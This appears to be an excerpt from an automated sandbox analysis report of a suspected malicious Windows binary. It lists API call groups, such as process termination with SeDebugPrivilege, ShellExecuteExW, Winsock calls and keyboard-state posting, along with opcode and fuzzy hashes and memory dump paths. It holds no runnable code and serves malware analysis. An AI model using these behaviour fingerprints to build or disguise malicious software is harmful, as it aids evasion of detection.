                                                                                                                      • Opcode Fuzzy Hash: f4d3b5e0e231b75d93338a011f21a1345299a99f52bdc2c5991a2a6736f6b2f4
                                                                                                                      • Instruction Fuzzy Hash: EF11E1B5910218BFF6106F64DC89FAA3F6DEB4D754F111425F244AB0A0C9F26C50EBA4
                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0051853C,00000B00,?,?), ref: 0051892A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,0051853C,00000B00,?,?), ref: 00518931
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0051853C,00000B00,?,?), ref: 00518946
                                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0051853C,00000B00,?,?), ref: 0051894E
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0051853C,00000B00,?,?), ref: 00518951
                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0051853C,00000B00,?,?), ref: 00518961
                                                                                                                      • GetCurrentProcess.KERNEL32(0051853C,00000000,?,0051853C,00000B00,?,?), ref: 00518969
                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,0051853C,00000B00,?,?), ref: 0051896C
                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00518992,00000000,00000000,00000000), ref: 00518986
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1957940570-0
                                                                                                                      • Opcode ID: c69e54f5c35103dd3f0b4aebffb4a7c38ce512c1c38857ba2aeba192811a946d
                                                                                                                      • Instruction ID: 9e983b6363f4ef70c666c4dc351099fe39d28bc8a3f857a85c0c9997ffcc3947
                                                                                                                      • Opcode Fuzzy Hash: c69e54f5c35103dd3f0b4aebffb4a7c38ce512c1c38857ba2aeba192811a946d
                                                                                                                      • Instruction Fuzzy Hash: 9E01BF79640304FFE710ABA9DC4DFA73BACEB99715F405421FA05DB191CA709804DB20
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 0-572801152
                                                                                                                      • Opcode ID: 93da68b19f1f06f540b556daca975cd1d40fc4979edd2a54b9d69163be862315
                                                                                                                      • Instruction ID: 09d477c07df3ab1b00db1db336ce60fb0e71c42c744aaa60637afd6e0ff2a0d4
                                                                                                                      • Opcode Fuzzy Hash: 93da68b19f1f06f540b556daca975cd1d40fc4979edd2a54b9d69163be862315
                                                                                                                      • Instruction Fuzzy Hash: 0FC186B1A0021A9FDF10DF98D885BEEBBF9FF48314F148469E905A7281E7B09D45DB90
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0051710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?,?,00517455), ref: 00517127
                                                                                                                        • Part of subcall function 0051710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517142
                                                                                                                        • Part of subcall function 0051710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?,?), ref: 00517150
                                                                                                                        • Part of subcall function 0051710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00517044,80070057,?), ref: 00517160
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00539806
                                                                                                                      • _memset.LIBCMT ref: 00539813
                                                                                                                      • _memset.LIBCMT ref: 00539956
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00539982
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0053998D
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 005399DB
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 1300414916-2785691316
                                                                                                                      • Opcode ID: f723ff34ed361134490092fa663dd89f211fba3970ef6193cef83c809de8f2e4
                                                                                                                      • Instruction ID: 0dd32e4d9a2341c77490a0ccba7f9e6083d14ebf224a9a9d5fd3efd3f26f7281
                                                                                                                      • Opcode Fuzzy Hash: f723ff34ed361134490092fa663dd89f211fba3970ef6193cef83c809de8f2e4
                                                                                                                      • Instruction Fuzzy Hash: 059139B1D00229EBDB10DFA5DC84EDEBBB9BF49314F10415AF519A7281DB71AA44CFA0
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00546E24
                                                                                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00546E38
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00546E52
                                                                                                                      • _wcscat.LIBCMT ref: 00546EAD
                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00546EC4
                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00546EF2
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window_wcscat
                                                                                                                      • String ID: SysListView32
                                                                                                                      • API String ID: 307300125-78025650
                                                                                                                      • Opcode ID: d42411bc32c6d427d6ce075f46a9d1f94a2657cd91fb5b61350f88cde971d6ad
                                                                                                                      • Instruction ID: 913f3c09fa53b3e8c4aff71c32973e3c728f9918eb2a766c0a1f43c44976653a
                                                                                                                      • Opcode Fuzzy Hash: d42411bc32c6d427d6ce075f46a9d1f94a2657cd91fb5b61350f88cde971d6ad
                                                                                                                      • Instruction Fuzzy Hash: 2D419074A00349AFEF219F64CC85BEABBF8FF09358F10442AF584E7291D6719D848B60
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00523C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00523C7A
                                                                                                                        • Part of subcall function 00523C55: Process32FirstW.KERNEL32(00000000,?), ref: 00523C88
                                                                                                                        • Part of subcall function 00523C55: CloseHandle.KERNEL32(00000000), ref: 00523D52
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053E9A4
                                                                                                                      • GetLastError.KERNEL32 ref: 0053E9B7
                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0053E9E6
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0053EA63
                                                                                                                      • GetLastError.KERNEL32(00000000), ref: 0053EA6E
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0053EAA3
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                      • API String ID: 2533919879-2896544425
                                                                                                                      • Opcode ID: e96732cb0ca1bbd1a10288b73db67e5eaa0585491de497a78b782531ad8f9b0b
                                                                                                                      • Instruction ID: 90e35dd1a24b8912460b59cdf5d883d886746233193ef75044a1a985bf7de29b
                                                                                                                      • Opcode Fuzzy Hash: e96732cb0ca1bbd1a10288b73db67e5eaa0585491de497a78b782531ad8f9b0b
                                                                                                                      • Instruction Fuzzy Hash: 6A418A31200201AFDB14EF14C89AFAEBBE5BF81318F04841DF9069B2D2CB75AC48DB95
                                                                                                                      APIs
                                                                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00523033
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoad
                                                                                                                      • String ID: blank$info$question$stop$warning
                                                                                                                      • API String ID: 2457776203-404129466
                                                                                                                      • Opcode ID: 19ae3ebb1fcdcfac2bd3739c2420727f4c31742d3ef5d34709e16faea356758b
                                                                                                                      • Instruction ID: ba6702cad94df0c12fbd69fa954eb07b55556c7730bf1cca28b792dbe294d564
                                                                                                                      • Opcode Fuzzy Hash: 19ae3ebb1fcdcfac2bd3739c2420727f4c31742d3ef5d34709e16faea356758b
                                                                                                                      • Instruction Fuzzy Hash: FE110B353483A6BEE7149A19FC4AC6B7F9CBF16324F10402AF904561C1DAA95F4056B4
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00524312
• LoadStringW.USER32(00000000), ref: 00524319
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0052432F
• LoadStringW.USER32(00000000), ref: 00524336
• _wprintf.LIBCMT ref: 0052435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 0052437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00524357
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 272b6ed80d9e65296671a3853113cfb3938e68ccfed63418f902f157e5660953
• Instruction ID: 31a86ed343d8ffd8271afffc503a5290edd2427a7b0a876b90d8c11277899d48
• Opcode Fuzzy Hash: 272b6ed80d9e65296671a3853113cfb3938e68ccfed63418f902f157e5660953
• Instruction Fuzzy Hash: 33018FF6900218BFE711DBA4DD8DEE7776CEB19305F0005A1BB09E2051EA349E889B74
APIs
  • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
• GetSystemMetrics.USER32(0000000F), ref: 0054D47C
• GetSystemMetrics.USER32(0000000F), ref: 0054D49C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0054D6D7
• SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0054D6F5
• SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0054D716
• ShowWindow.USER32(00000003,00000000), ref: 0054D735
• InvalidateRect.USER32(?,00000000,00000001), ref: 0054D75A
• DefDlgProcW.USER32(?,00000005,?,?), ref: 0054D77D
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
• Opcode ID: 8279a556694c6b3d7720f2c5015482f875602e8bf0ce9a4c9c24e1327ef4a5c2
• Instruction ID: 69a3d44a76923e6087b06016a413e941467b29ee91ce1214e86559226a18d87d
• Opcode Fuzzy Hash: 8279a556694c6b3d7720f2c5015482f875602e8bf0ce9a4c9c24e1327ef4a5c2
• Instruction Fuzzy Hash: 08B1B935600229EFDF14CF68C985BED7BB1FF04718F098069EC48AB295DB34A950DBA0
APIs
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000), ref: 004C2ACF
• ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 004C2B17
• ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000), ref: 004FC21A
• ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,004FC1C7,00000004,00000000,00000000,00000000), ref: 004FC286
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: fe91726af5046c1e4792dcdb0b6ff8edefa3915c838cd65b73a6af1d0475e596
• Instruction ID: aad58180530943f11dfbeca8313a9e9fcfee798fdf17e14cb5f378766901fced
• Opcode Fuzzy Hash: fe91726af5046c1e4792dcdb0b6ff8edefa3915c838cd65b73a6af1d0475e596
• Instruction Fuzzy Hash: 33412D386046849ACBF59B288FC8F7B7B91FB95304F15881FE14742760C6FEA846D719
APIs
• InterlockedExchange.KERNEL32(?,000001F5), ref: 005270DD
  • Part of subcall function 004E0DB6: std::exception::exception.LIBCMT ref: 004E0DEC
  • Part of subcall function 004E0DB6: __CxxThrowException@8.LIBCMT ref: 004E0E01
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00527114
• EnterCriticalSection.KERNEL32(?), ref: 00527130
• _memmove.LIBCMT ref: 0052717E
• _memmove.LIBCMT ref: 0052719B
• LeaveCriticalSection.KERNEL32(?), ref: 005271AA
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 005271BF
• InterlockedExchange.KERNEL32(?,000001F6), ref: 005271DE
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 2f44c6a66457ee47f2fcbebdaf1dff40ce88baca9f7065584b2dc210b6a76458
• Instruction ID: e0f285dc3b22ae1754ba305f7b504394ba9ee24b5fb39cdd68943019f85bc7ef
• Opcode Fuzzy Hash: 2f44c6a66457ee47f2fcbebdaf1dff40ce88baca9f7065584b2dc210b6a76458
• Instruction Fuzzy Hash: 8A318035900205EBCB00DFA9DC859AB7B78FF45314F1440BAF9049B246D7749E54DB64
APIs
• DeleteObject.GDI32(00000000), ref: 005461EB
• GetDC.USER32(00000000), ref: 005461F3
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 005461FE
• ReleaseDC.USER32(00000000,00000000), ref: 0054620A
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00546246
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00546257
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0054902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00546291
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005462B1
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 0ea84417c485af204bdad0c35ca0508f643eec7fc010756bb5d4e23a310d41e6
• Instruction ID: a636d1078f76a328a37d26072caff0cec38471f45d1ec673b12a26bd53f9c23c
• Opcode Fuzzy Hash: 0ea84417c485af204bdad0c35ca0508f643eec7fc010756bb5d4e23a310d41e6
• Instruction Fuzzy Hash: EE319F7A201210BFEB108F14CC8AFEB3FA9FF5A769F050065FE089A191C6B59C45CB60
APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: 4bae76e11e3bbc13b642c9c6e7721353993cdb115efeb519294ca3010f9a41e8
• Instruction ID: 22bb2167e76952044c8f91f2fa8a8af2e6e44f2f55c31514d629f09677928d2c
• Opcode Fuzzy Hash: 4bae76e11e3bbc13b642c9c6e7721353993cdb115efeb519294ca3010f9a41e8
• Instruction Fuzzy Hash: AB21017224520A7BF20467129D92FFB7F5CBF1138DF08402AFD0496A83EB28DE5582E5
APIs
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
  • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
• _wcstok.LIBCMT ref: 0052EC94
• _wcscpy.LIBCMT ref: 0052ED23
• _memset.LIBCMT ref: 0052ED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 0a1741a1d9234cdeb8fa11a7fd67aedbce6b952eddda6bb4553ffaed922dde52
• Instruction ID: 958026406d9677320a252041789ff3193576fc848eb6e588ea5b19984a417fb1
• Opcode Fuzzy Hash: 0a1741a1d9234cdeb8fa11a7fd67aedbce6b952eddda6bb4553ffaed922dde52
• Instruction Fuzzy Hash: 48C1C0745083519FC754EF25D886E6ABBE4FF85314F00482EF8999B2A2DB34EC45CB86
APIs
• __WSAFDIsSet.WSOCK32(00000000,?), ref: 00536C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00536C21
• WSAGetLastError.WSOCK32(00000000), ref: 00536C34
• htons.WSOCK32(?), ref: 00536CEA
• inet_ntoa.WSOCK32(?), ref: 00536CA7
  • Part of subcall function 0051A7E9: _strlen.LIBCMT ref: 0051A7F3
  • Part of subcall function 0051A7E9: _memmove.LIBCMT ref: 0051A815
• _strlen.LIBCMT ref: 00536D44
• _memmove.LIBCMT ref: 00536DAD
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
• String ID:
• API String ID: 3619996494-0
• Opcode ID: 6ec5e633468656b6416caab08380f916016975a58051701335efb082c5775c7f
• Instruction ID: 7fbb157e9b2e61d41c1c7460c5ed4e8683da7273b11c74ac0b0c8b796a8e3ac0
• Opcode Fuzzy Hash: 6ec5e633468656b6416caab08380f916016975a58051701335efb082c5775c7f
• Instruction Fuzzy Hash: C681F075204200BBC750EF25CC96FABBBA8BF84718F10891EF5569B292DA74ED04CB55
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ec5c07bd95069eff5a9a22657a69a8c204580d3d6ed8fc1e277b0edc517a800
• Instruction ID: 5cf30185be5cd5b1b3274cbb7d22b040cdfadcb37c8c3542fad9f067b7f29461
• Opcode Fuzzy Hash: 7ec5c07bd95069eff5a9a22657a69a8c204580d3d6ed8fc1e277b0edc517a800
• Instruction Fuzzy Hash: 77716F38900109EFDB449F58CC48EBF7B75FF86314F14815EF915AA262C7389A51CBA9
APIs
• IsWindow.USER32(01085420), ref: 0054B3EB
• IsWindowEnabled.USER32(01085420), ref: 0054B3F7
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0054B4DB
• SendMessageW.USER32(01085420,000000B0,?,?), ref: 0054B512
• IsDlgButtonChecked.USER32(?,?), ref: 0054B54F
• GetWindowLongW.USER32(01085420,000000EC), ref: 0054B571
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0054B589
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: ffdfa0a0e8d327729098823858867f5936dac05410dfedccf2311ab567d7aad7
• Instruction ID: 0e8342a8829ff3a19ab6a84d6443d654c089cb866b8ea03d365a3190e85302c7
• Opcode Fuzzy Hash: ffdfa0a0e8d327729098823858867f5936dac05410dfedccf2311ab567d7aad7
• Instruction Fuzzy Hash: E4718E34604204AFFF249F55C898FEA7FBAFF19308F144459E945972A2D732E950DB50
APIs
• _memset.LIBCMT ref: 0053F448
• _memset.LIBCMT ref: 0053F511
• ShellExecuteExW.SHELL32(?), ref: 0053F556
  • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
  • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
  • Part of subcall function 004DFC86: _wcscpy.LIBCMT ref: 004DFCA9
• GetProcessId.KERNEL32(00000000), ref: 0053F5CD
• CloseHandle.KERNEL32(00000000), ref: 0053F5FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
• Opcode ID: c083c5710ad4f535df2cba69553ef762c9cfd786dd111e8b60f439b2402bef2f
• Instruction ID: 0982a8b086071fa4ca28f61971e98f5a62d1feece051448664d76e20d0c40abe
• Opcode Fuzzy Hash: c083c5710ad4f535df2cba69553ef762c9cfd786dd111e8b60f439b2402bef2f
• Instruction Fuzzy Hash: BB61AC75E006199FCF14EF69C885AAEBBB4FF49314F10806EE816AB351CB34AD41CB94
APIs
• GetParent.USER32(?), ref: 00520F8C
• GetKeyboardState.USER32(?), ref: 00520FA1
• SetKeyboardState.USER32(?), ref: 00521002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00521030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0052104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00521095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 005210B8
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 3f259ae7a821e31fa2e474c5f43c066b01cb6c13de48612a9e690d1b0c703158
• Instruction ID: e1bb28400314e42dd5a6785d95aaeff83a6c2beb1b6efea1687c01fe2213fbc6
• Opcode Fuzzy Hash: 3f259ae7a821e31fa2e474c5f43c066b01cb6c13de48612a9e690d1b0c703158
• Instruction Fuzzy Hash: 54511360544BE53EFB3642349C09BB7BEA97F17304F088589E1C4458D3C2A8ECD8D764
APIs
• GetParent.USER32(00000000), ref: 00520DA5
• GetKeyboardState.USER32(?), ref: 00520DBA
• SetKeyboardState.USER32(?), ref: 00520E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00520E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00520E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00520EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00520EC9
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
